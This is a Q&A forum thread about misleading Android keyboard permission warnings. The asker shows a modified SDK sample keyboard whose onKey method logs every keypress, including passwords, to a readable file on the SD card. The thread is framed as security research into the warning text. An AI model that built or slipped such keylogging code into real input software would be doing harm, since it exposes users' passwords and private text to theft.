Android Custom Keyboard Password Logging

Question

I've been doing some research on security vulnerabilities with Android custom keyboards, and noticed something interesting. When I install a keyboard on my Sharp Aquos Gingerbread phone, it tells me that it "may be able to collect all the text you type including passwords". However, on my Samsung Galaxy Tab 2 running ICS, it says "except passwords".

I decided to test this, and modified the SoftKeyboard Android SDK Sample to include a keylogger, writing to the SD card to make it easier to access from other apps:

public void onKey(int primaryCode, int[] keyCodes) {
    String keypress = String.valueOf((char)primaryCode);
    Log.d("Key Pressed",keypress);
    try{
        String SDCARD = Environment.getExternalStorageDirectory().getAbsolutePath();
        String FILENAME = "keylogger.txt";

        File outfile = new File(SDCARD+File.separator+FILENAME);
        FileOutputStream fos = new FileOutputStream(outfile,true);
        fos.write(keypress.getBytes());
        fos.close();
    }catch(Exception e) {
        Log.d("EXCEPTION",e.getMessage());
    }

And I was able to log the text, even in an HTML password field.

So, the message on my Galaxy Tab seems to be incorrect/misleading.

Is this the same message on all ICS devices, or has Samsung changed the message from the stock Android build? Does anybody know why it says "except passwords" when they are quite easy to log?

Answer 1

On Galaxy Nexus it says 'including personal data like passwords and credit card numbers'. You'll have to contact Samsung to get real info, but unless they disallow using a custom keyboard on password fields or something like this, everything you type goes through the software keyboard at some point, so they will be able to log it.